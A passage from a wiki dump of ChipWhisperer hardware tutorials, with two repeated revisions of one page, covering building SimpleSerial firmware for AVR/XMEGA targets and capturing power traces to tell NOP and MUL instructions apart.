/* End user-specific code here. *
********************************/</source></li>
<li>Change the terminal to the directory with your source, and run <code>make</code> to build the system. Remember you can press the up arrow on the keyboard to get recently typed commands in most OSes:
<pre>make</pre>
Which should have the following output, you will '''want to check the build platform is what you expect''':
<pre>...Bunch of lines removed...
Creating Extended Listing: simpleserial-base.lss
avr-objdump -h -S -z simpleserial-base.elf > simpleserial-base.lss

Creating Symbol Table: simpleserial-base.sym
avr-nm -n simpleserial-base.elf > simpleserial-base.sym

Size after:
AVR Memory Usage
----------------
Device: atxmega128d3

Program: 1568 bytes (1.1% Full)
(.text + .data + .bootloader)

Data: 224 bytes (2.7% Full)
(.data + .bss + .noinit)

Built for platform CW-Lite XMEGA

-------- end --------</pre></li>
<li>Following the instructions given in [[Tutorial_B1_Building_a_SimpleSerial_Project]], program the AVR or XMEGA with your new code. Note you __do not__ need to close the programming window. If you will be doing frequent modifications to the source code, this can simplify your life since you only need to hit the '''Program''' button in AVRStudio to download new code.</li>
<li>Ensure the hardware is setup as in [[Tutorial_B1_Building_a_SimpleSerial_Project]]. If using the CW1002, ensure the SMA cable is also connected as described in the previous tutorial.</li></ol>

= Capturing Power Traces =

The basic steps to connect to the ChipWhisperer device are described in [[Tutorial_B1_Building_a_SimpleSerial_Project]]. They are repeated here as well, however see [[Tutorial_B1_Building_a_SimpleSerial_Project]] for pictures & mode details.

<ol style="list-style-type: decimal;">
<li>Start ChipWhisperer-Capture</li>
<li>Under ''Generic Settings'' tab, as the ''Scope Module'', select the ''ChipWhisperer/OpenADC'' option.</li>
<li>Under ''Generic Settings'' tab, as the ''Target Module'', select the ''Simple Serial'' option.</li>
<li>Switch to the ''Target Settings'' tab, and as the ''connection'', select the ''ChipWhisperer'' (for CW1002) or ''NewAE USB (CWLite/CW1200)'' (for ChipWhisperer Lite/Pro).</li>
<li>Switch to the ''Scope Settings'' tab, and ensure the ''connection'' is set to either ''ChipWhisperer'' (for CW1002) or ''NewAE USB (CWLite/CW1200)'' (for ChipWhisperer Lite/Pro).</li>
<li>Run the master connect (click the button labeled ''Master: DIS''). Both the Target & Scope should switch to ''CON'' and be green circles.</li>
<li>For the CW1173/CW1180/Cw1200 (ChipWhisperer-Lite/Pro based systems), perform the following:
<blockquote><ol style="list-style-type: lower-alpha;">
<li>Set the ''CLKGEN'' frequency to ''7.37 MHz''</li>
<li>Set the ''Target HS-IO Out'' as ''CLKGEN''</li></ol>
</blockquote></li>
<li>If targetting an XMEGA board (either the ChipWhisperer-Lite XMEGA default target, or the XMEGA on the multi-target board), perform the following:
<ol style="list-style-type: lower-alpha;">
<li>Set ''Target IO1'' as ''Serial RXD''</li>
<li>Set ''Target IO2'' as ''Serial TXD''</li></ol>
</li>
<li>Open the status monitor (Tools > Encryption Status Monitor).</li></ol>

; 10. Hit the ''Run 1'' [[File:Capture One Button.PNG|image]] button. You may have to hit it a few times, as the very first serial data is often lost. You should see data populate in the ''Text Out'' field of the monitor window. The ''Text In'' and ''Text Out'' aren't actually used in this example, so you can close the ''Monitor'' dialog.

At this point you've completed the same amount of information as the previous tutorial. The following section describes how to setup the analog capture hardware, which is new (to you). The following is entirely done in the ''Scope Settings'' tab:

[[File:01_trigger_setupxcf.PNG|image]]

<ol start="11" style="list-style-type: decimal;">
<li>Under ''Trigger Setup'' set the ''Mode'' to ''rising edge''. This means the system will trigger on a rising edge logic level:</li></ol>

[[File:02_CW_Extra.PNG|image]]

{{Warningbox|Beginning of a hardware specific section for CW1002}}

<blockquote><ol start="12" style="list-style-type: decimal"><li>For the CW1002 (ChipWhisperer Capture Rev 2) hardware only, perform the following:</li>
<ol style="list-style-type: lower-alpha;">
<li>Under the ''Trigger Pins'' unselect the ''Front Panel A'' as an option, and select ''Target IO4 (Trigger Line)''. This will mean only the trigger pin coming from the AVR target is used to trigger the capture.</li>
<li>In the same area, select the ''Clock Source'' as being from ''Target IO-IN''
[[File:03_ADC_Clock.png|image]]</li>
<li>You can monitor the ''Freq Counter'' option, which measures the frequency being used on the ''EXTCLK'' input. This should be 7.37 MHz, which is the oscillator on the multi-target board.</li>
<li>Change the ''ADC Clock'' ''source'' as being ''EXTCLK x4 via DCM''. This routes the external clock through a 4x multiplier, and routes it to the ADC.</li></ol></ol>
</blockquote>

{{Warningbox|End of CW1002 (ChipWhisperer Capture Rev 2) specific section}}
 

<ol start="12" style="list-style-type: decimal;">

<li>For the CW1173/CW1180/Cw1200 (ChipWhisperer-Lite/Pro based hardware), perform the following:</li></ol>

<blockquote><ol start="4" style="list-style-type: lower-alpha;">
<li>Change the ''ADC Clock'' ''source'' as being ''CLKGEN x4 via DCM''. This routes the device clock through a 4x multiplier, and routes it to the ADC.</li></ol>
</blockquote>
<ol start="13" style="list-style-type: decimal;">
<li>Hit the '''Reset ADC DCM''' button.</li>

[[File:04_ADC_Clock_2_1.png|image]]</ol>

<ol start="14" style="list-style-type: decimal;">
<li>The ''ADC Freq'' should show 29.5 MHz (which is 4x 7.37 MHz), and the ''DCM Locked'' checkbox __MUST__ be checked. If the ''DCM Locked'' checkbox is NOT checked, try hitting the ''Reset ADC DCM'' button again.</li>
<li>At this point you can hit the ''Capture 1'' button, and see if the system works! You should end up with a window looking like this:
[[File:05_Low_Gain.PNG|image|1250px]]
Whilst there is a waveform, you need to adjust the capture settings. There are two main settings of importance, the analog gain and number of samples to capture.</li>

[[File:06_high_gain.PNG|image|1250px]]</ol>

<ol start="16" style="list-style-type: decimal;">
<li>Under ''Gain Setting'' set the ''Mode'' to ''high''. Increase the ''Gain Setting'' to about 25. You'll be able to adjust this further during experimentations, you may need to increase this depending on your hardware and target device. For the multi-target board with the CW1002 you will probably need to set this around 40.</li>
<li>Under ''Trigger Setup'' set the ''Total Samples'' to ''500''.</li>
<li>Try a few more ''Capture 1'' traces, and you should see a 'zoomed-in' waveform.</li></ol>

= Modifying the Target =

== Background on Setup ==

This tutorial is using either an AtMega328p which is an Atmel AVR device, or AtXMEGA128D4 which is an Atmel XMEGA device. We are comparing the power consumption of two different instructions, the <code>MUL</code> (multiply) instruction and the <code>NOP</code> (no operation) instruction. Some information on these two instructions:

; mul
* Multiples two 8-bit numbers together.
* Takes 2 clock cycles to complete
* Intuitively expect fairly large power consumption due to complexity of operation required
; nop
* Does nothing
* Takes 1 clock cycle to complete
* Intuitively expect low power consumption due to core doing nothing

Note that the capture clock is running at 4x the device clock. Thus a single <code>mul</code> instruction should span 8 samples on our output graph, since it takes 4 samples to cover a complete clock cycle.

== Initial Code ==

The initial code has a power signature something like this (yours will vary based on various physical considerations, and depending if you are using an XMEGA or AVR device):

[[File:cap_nop_mul.png|image]]

Note that the 10 <code>mul</code> instructions would be expected to take 80 samples to complete, and the 10 <code>nop</code> instructions should take 40 samples to complete. By modifying the code we can determine exactly which portion of the trace is corresponding to which operations.

== Increase number of NOPs ==

We will then modify the code to have twenty NOP operations in a row instead of ten. The modified code looks like this:

<blockquote><source lang="c">/**********************************
* Start user-specific code here. */
trigger_high();

asm volatile(
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
::
);

asm volatile(
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
::
);

asm volatile(
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
::
);

trigger_low();
/* End user-specific code here. *
********************************/</source></blockquote>
Note that the <code>mul</code> operation takes 2 clock cycles on the AVR, and the <code>nop</code> operation takes 1 clock cycles. Thus we expect to now see two areas of the power trace which appear to take approximately the same time. The resulting power trace looks like this:

[[File:cap_doublenop_mul.png|image]]

Pay particular attention to the section between sample number 0 & sample number 180. It is in this section we can compare the two power graphs to see the modified code. We can actually 'see' the change in operation of the device! It would appear the <code>nop</code> is occuring from approximately 10-90, and the <code>mul</code> occuring from 90-170.

== Add NOP loop after MUL ==

Finally, we will add 10 more NOPs after the 10 MULs. The code should look something like this:

<blockquote><source lang="c">/**********************************
* Start user-specific code here. */
trigger_high();

asm volatile(
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
::
);

asm volatile(
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
::
);

asm volatile(
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
"mul r0,r1" "\n\t"
::
);

asm volatile(
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
"nop" "\n\t"
::
);

trigger_low();
/* End user-specific code here. *
********************************/</source></blockquote>
With an output graph that looks like this:

<blockquote>[[File:cap_doublenop_mul_nop.png|image]]
</blockquote>
== Comparison of All Three ==

The following graph lines the three options up. One can see where adding loops of different operations shows up in the power consumption.

<blockquote>[[File:nop_mul_comparison.png|image]]
</blockquote>
= Clock Phase Adjustment =

A final area of interest is the clock phase adjustment. The clock phase adjustment is used to shift the ADC sample clock from the actual device clock by small amounts. This will affect the appearance of the captured waveform, and in more advanced methods is used to improve the measurement.

The phase adjustment is found under the ''Phase Adjust'' option of the ''ADC Clock'' setting:

<blockquote>[[File:phasesetting.png|image]]
</blockquote>
To see the effect this has, first consider an image of the power measured by a regular oscilloscope (at 1.25GS/s):

<blockquote>[[File:scope_real.png|image]]
</blockquote>
And the resulting waveforms for a variety of different phase shift settings:

[[File:phase_differences.png|image]]

The specifics of the capture are highly dependent on each ChipWhisperer board & target platform. The phase shift allows customization of the capture waveform for optimum performance, however what constitutes 'optimum performance' is highly dependent on the specifics of your algorithm.

= Conclusion =

In this tutorial you have learned how power analysis can tell you the operations being performed on a microcontroller. In future work we will move towards using this for breaking various forms of security on devices.

{{Template:Tutorials}}
[[Category:Tutorials]]

Tutorial B1 Building a SimpleSerial Project

2017-07-18T23:34:59Z

DavidRysk: Fix tag

This tutorial will introduce you to the 'simpleserial' communications system. It will show you how to perform different operations on data based on input from the ChipWhisperer software. This can be used for building your own system which you wish to 'break'.

{{TOC|limit=3}}

<h1> What is SimpleSerial </h1>

[[SimpleSerial]] is the communications protocol used for almost all of the ChipWhisperer demo project. It's a very basic serial protocol which can be easily implemented on most systems. This system communicates using a standard asyncronous serial protocol, 38400 baud, 8-N-1.

All messages are sent in ASCII-text, and are normally terminated with a line-feed ('\n'). This allows you to interact with the simpleserial system over a standard terminal emulator.

The following message types are defined:

; <code>x</code>
: Sending a 'x' resets the buffers. This does not require a line-feed termination. It is suggested to always send a stream of x's to initilize the system in case the device was already in some other mode due to noise/corruption.
; <code>k00112233445566778899AABBCCDDEEFF\\n</code>
: Loads the encryption key <code>00112233445566778899AABBCCDDEEFF</code> into the system. If not called the system may use some default key.
; <code>pAABBCCDDEEFF00112233445566778899\\n</code>
: Encrypts the data <code>AABBCCDDEEFF00112233445566778899</code> with the key loaded with the 'k' command. The system will respond with a string starting with r, as shown next.
; <code>rCBBD4A2B34F2571758FF6A797E09859D\\n</code>
: This is the response from the system. If data has been encrypted with a 'p' for example, the system will respond with the 'r' sequence automatically. So sending the earlier example means the result of the encryption was <code>cbbd4a2b34f2571758ff6a797e09859d</code>.

<h1> Building the Basic Example </h1>

You'll need to have installed avr-gcc and avr-libc. You may have already done this by following the installation guide, or if using the ChipWhisperer-VM it comes prepared with avr-gcc already setup. See the [[Installing_ChipWhisperer]] guide for details.

Once you have a working compiler (check by typing 'avr-gcc' at the command line - if using Windows you may need to setup a special batch file to provide you with a avr-gcc command prompt).

<ol style="list-style-type: decimal;">
<li>We want to use the existing SimpleSerial firmware as a base for our project, but we don't want to edit the existing firmware. Instead, we'll make a new project with a copy of this firmware. Copy the directory <code>simpleserial-base</code> which is found at <code>chipwhisperer/hardware/victims/firmware/</code> of the chipwhisperer release to a new directory called <code>simpleserial-base-lab1</code>. You must keep it in the same directory, as it will reference other files within that directory for the build process.</li>
<li><dl>
<dt>Open a terminal with avr-gcc in the path. If using Windows the sidebar on the [[Installing_ChipWhisperer]] page - you can either add WinAVR to your system path, or you can run the 'winavr.bat' file suggested.</dt></dl>
</li>
<li>Change the terminal to the newly copied directory. For example:
Windows:<pre>cd c:\chipwhisperer\hardware\victims\firmware\simpleserial-base-lab1</pre>
Linux/macOS:<pre>cd chipwhisperer/hardware/victims/firmware/simpleserial-base-lab1</pre></li>
<li>Then, run <code>make</code> to build the system. Make sure you specify which platform you're using as your target. For example, for the ChipWhisperer Lite target, run
<pre>make PLATFORM=CW303</pre>
Which should have the following output:
<pre>...Bunch of lines removed...
Creating Extended Listing: simpleserial-base.lss
avr-objdump -h -S -z simpleserial-base.elf > simpleserial-base.lss

Creating Symbol Table: simpleserial-base.sym
avr-nm -n simpleserial-base.elf > simpleserial-base.sym

Size after:
AVR Memory Usage
----------------
Device: atxmega128d3

Program: 1524 bytes (1.1% Full)
(.text + .data + .bootloader)

Data: 224 bytes (2.7% Full)
(.data + .bss + .noinit)

Built for platform CW-Lite XMEGA

-------- end --------</pre></li>
Ensure that the "Built for platform ___" matches your target device.
</ol>

<h1> Modifying the Basic Example </h1>

At this point we want to modify the system to perform 'something' with the data, such that we can confirm the system is working. To do so, open the file <code>simpleserial-base.c</code> with a code editor such as ''Programmer's Notepad'' (which ships with WinAVR).

<ol style="list-style-type: decimal;">
<li>Find the following code block towards the end of the file:
<syntaxhighlight lang="c">/**********************************
* Start user-specific code here. */
trigger_high();

//16 hex bytes held in 'pt' were sent
//from the computer. Store your response
//back into 'pt', which will send 16 bytes
//back to computer. Can ignore of course if
//not needed

trigger_low();
/* End user-specific code here. *
********************************/</syntaxhighlight></li>
<li>Modify it to increment the value of each sent data byte:
<syntaxhighlight lang="c">/**********************************
* Start user-specific code here. */
trigger_high();

//16 hex bytes held in 'pt' were sent
//from the computer. Store your response
//back into 'pt', which will send 16 bytes
//back to computer. Can ignore of course if
//not needed

for(int i = 0; i < 16; i++){
pt[i]++;
}

trigger_low();
/* End user-specific code here. *
********************************/</syntaxhighlight></li>
<li>Rebuild the example using the <code>make</code> command. Remember you can press the up arrow on the keyboard to get recently typed commands in most OSes.</li></ol>

{{CollapsibleSection
|intro = = Completing Tutorial with CW1173 (Lite) =
|content= Completing Tutorial with CW1173}}

{{CollapsibleSection
|intro = = Completing Tutorial with CW1200 (Pro) =
|content= Completing Tutorial with CW1200}}

{{CollapsibleSection
|intro = = Completing Tutorial with CW1002 (ChipWhisperer Capture Rev2) =
|content= Completing Tutorial with CW1002 (ChipWhisperer Capture Rev2)}}

<h1> Conclusion </h1>

In this tutorial you have learned how to build a custom program for the microcontroller on the ChipWhisperer target board. You have programmed the built .hex file into the microcontroller, and confirmed communications with the ChipWhisperer device.

In future labs you will build on this knowledge to attack specific instructions.

<h1> Troubleshooting </h1>

Issues with compilation:

<blockquote><ol style="list-style-type: decimal;">
<li>You may have to generate the .dep and objdir directories manually before make will work:
<pre>mkdir .dep
mkdir objdir</pre></li>
<li>On Windows 8, you may get an error like fork: resyntaxhighlight temporarily unavailable. This requires you to install an updated mysys.dll. Download from http://www.madwizard.org/download/electronics/msys-1.0-vista64.zip, unzip file, and copy the .dll to <code>C:\WinAVR-20100110\utils\bin</code>, replacing the existing file.</li>
<li>For the AVR Studio USB Drivers, you'll need to download a [https://gallery.atmel.com/Products/Details/004ccabd-e18e-431a-8557-83deaea23341 Special Update] from Atmel.</li>
<li>You may wish to use the "ChipWhisperer Virtual Machine" on newer Windows systems, which does not require any of the above setup.</li></ol>
</blockquote>

{{Template:Tutorials}}
[[Category:Tutorials]]

Tutorial B1 Building a SimpleSerial Project

2017-07-18T23:18:44Z

DavidRysk: Add command lines for Linux/macOS

This tutorial will introduce you to the 'simpleserial' communications system. It will show you how to perform different operations on data based on input from the ChipWhisperer software. This can be used for building your own system which you wish to 'break'.

{{TOC|limit=3}}

<h1> What is SimpleSerial </h1>

[[SimpleSerial]] is the communications protocol used for almost all of the ChipWhisperer demo project. It's a very basic serial protocol which can be easily implemented on most systems. This system communicates using a standard asyncronous serial protocol, 38400 baud, 8-N-1.

All messages are sent in ASCII-text, and are normally terminated with a line-feed ('\n'). This allows you to interact with the simpleserial system over a standard terminal emulator.

The following message types are defined:

; <code>x</code>
: Sending a 'x' resets the buffers. This does not require a line-feed termination. It is suggested to always send a stream of x's to initilize the system in case the device was already in some other mode due to noise/corruption.
; <code>k00112233445566778899AABBCCDDEEFF\\n</code>
: Loads the encryption key <code>00112233445566778899AABBCCDDEEFF</code> into the system. If not called the system may use some default key.
; <code>pAABBCCDDEEFF00112233445566778899\\n</code>
: Encrypts the data <code>AABBCCDDEEFF00112233445566778899</code> with the key loaded with the 'k' command. The system will respond with a string starting with r, as shown next.
; <code>rCBBD4A2B34F2571758FF6A797E09859D\\n</code>
: This is the response from the system. If data has been encrypted with a 'p' for example, the system will respond with the 'r' sequence automatically. So sending the earlier example means the result of the encryption was <code>cbbd4a2b34f2571758ff6a797e09859d</code>.

<h1> Building the Basic Example </h1>

You'll need to have installed avr-gcc and avr-libc. You may have already done this by following the installation guide, or if using the ChipWhisperer-VM it comes prepared with avr-gcc already setup. See the [[Installing_ChipWhisperer]] guide for details.

Once you have a working compiler (check by typing 'avr-gcc' at the command line - if using Windows you may need to setup a special batch file to provide you with a avr-gcc command prompt).

<ol style="list-style-type: decimal;">
<li>We want to use the existing SimpleSerial firmware as a base for our project, but we don't want to edit the existing firmware. Instead, we'll make a new project with a copy of this firmware. Copy the directory <code>simpleserial-base</code> which is found at <code>chipwhisperer/hardware/victims/firmware/</code> of the chipwhisperer release to a new directory called <code>simpleserial-base-lab1</code>. You must keep it in the same directory, as it will reference other files within that directory for the build process.</li>
<li><dl>
<dt>Open a terminal with avr-gcc in the path. If using Windows the sidebar on the [[Installing_ChipWhisperer]] page - you can either add WinAVR to your system path, or you can run the 'winavr.bat' file suggested.</dt></dl>
</li>
<li>Change the terminal to the newly copied directory. For example:
Windows:<pre>cd c:\chipwhisperer\hardware\victims\firmware\simpleserial-base-lab1</pre>
Linux/macOS:<pre>cd chipwhisperer/hardware/victims/firmware/simpleserial-base-lab1</pre></li>
<li>Then, run <code>make</code> to build the system. Make sure you specify which platform you're using as your target. For example, for the ChipWhisperer Lite target, run
<pre>make PLATFORM=CW303</pre>
Which should have the following output:
<pre>...Bunch of lines removed...
Creating Extended Listing: simpleserial-base.lss
avr-objdump -h -S -z simpleserial-base.elf > simpleserial-base.lss

Creating Symbol Table: simpleserial-base.sym
avr-nm -n simpleserial-base.elf > simpleserial-base.sym

Size after:
AVR Memory Usage
----------------
Device: atxmega128d3

Program: 1524 bytes (1.1% Full)
(.text + .data + .bootloader)

Data: 224 bytes (2.7% Full)
(.data + .bss + .noinit)

Built for platform CW-Lite XMEGA

-------- end --------</pre></li>
Ensure that the "Built for platform ___" matches your target device.
</ol>

</h1> Modifying the Basic Example </h1>

At this point we want to modify the system to perform 'something' with the data, such that we can confirm the system is working. To do so, open the file <code>simpleserial-base.c</code> with a code editor such as ''Programmer's Notepad'' (which ships with WinAVR).

<ol style="list-style-type: decimal;">
<li>Find the following code block towards the end of the file:
<syntaxhighlight lang="c">/**********************************
* Start user-specific code here. */
trigger_high();

//16 hex bytes held in 'pt' were sent
//from the computer. Store your response
//back into 'pt', which will send 16 bytes
//back to computer. Can ignore of course if
//not needed

trigger_low();
/* End user-specific code here. *
********************************/</syntaxhighlight></li>
<li>Modify it to increment the value of each sent data byte:
<syntaxhighlight lang="c">/**********************************
* Start user-specific code here. */
trigger_high();

//16 hex bytes held in 'pt' were sent
//from the computer. Store your response
//back into 'pt', which will send 16 bytes
//back to computer. Can ignore of course if
//not needed

for(int i = 0; i < 16; i++){
pt[i]++;
}

trigger_low();
/* End user-specific code here. *
********************************/</syntaxhighlight></li>
<li>Rebuild the example using the <code>make</code> command. Remember you can press the up arrow on the keyboard to get recently typed commands in most OSes.</li></ol>

{{CollapsibleSection
|intro = = Completing Tutorial with CW1173 (Lite) =
|content= Completing Tutorial with CW1173}}

{{CollapsibleSection
|intro = = Completing Tutorial with CW1200 (Pro) =
|content= Completing Tutorial with CW1200}}

{{CollapsibleSection
|intro = = Completing Tutorial with CW1002 (ChipWhisperer Capture Rev2) =
|content= Completing Tutorial with CW1002 (ChipWhisperer Capture Rev2)}}

<h1> Conclusion </h1>

In this tutorial you have learned how to build a custom program for the microcontroller on the ChipWhisperer target board. You have programmed the built .hex file into the microcontroller, and confirmed communications with the ChipWhisperer device.

In future labs you will build on this knowledge to attack specific instructions.

<h1> Troubleshooting </h1>

Issues with compilation:

<blockquote><ol style="list-style-type: decimal;">
<li>You may have to generate the .dep and objdir directories manually before make will work:
<pre>mkdir .dep
mkdir objdir</pre></li>
<li>On Windows 8, you may get an error like fork: resyntaxhighlight temporarily unavailable. This requires you to install an updated mysys.dll. Download from http://www.madwizard.org/download/electronics/msys-1.0-vista64.zip, unzip file, and copy the .dll to <code>C:\WinAVR-20100110\utils\bin</code>, replacing the existing file.</li>
<li>For the AVR Studio USB Drivers, you'll need to download a [https://gallery.atmel.com/Products/Details/004ccabd-e18e-431a-8557-83deaea23341 Special Update] from Atmel.</li>
<li>You may wish to use the "ChipWhisperer Virtual Machine" on newer Windows systems, which does not require any of the above setup.</li></ol>
</blockquote>

{{Template:Tutorials}}
[[Category:Tutorials]]